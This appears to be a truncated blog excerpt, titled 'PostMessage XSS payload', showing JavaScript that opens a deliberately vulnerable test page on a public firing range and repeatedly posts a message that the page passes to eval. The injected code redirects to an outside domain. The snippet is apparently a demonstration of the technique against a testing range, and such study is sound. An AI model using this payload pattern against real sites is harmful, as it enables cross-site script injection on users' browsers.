Click Here var h1Win; function openWin(){ h1Win = window.open("https://public-firing-range.appspot.com/dom/toxicdom/postMessage/eval"); setInterval(sendMessage, 250); } function sendMessage(){ h1Win.postMessage('window.open(\'http://ssrinc.co.kr\',\'_self...
원문 링크 : PostMessage XSS payload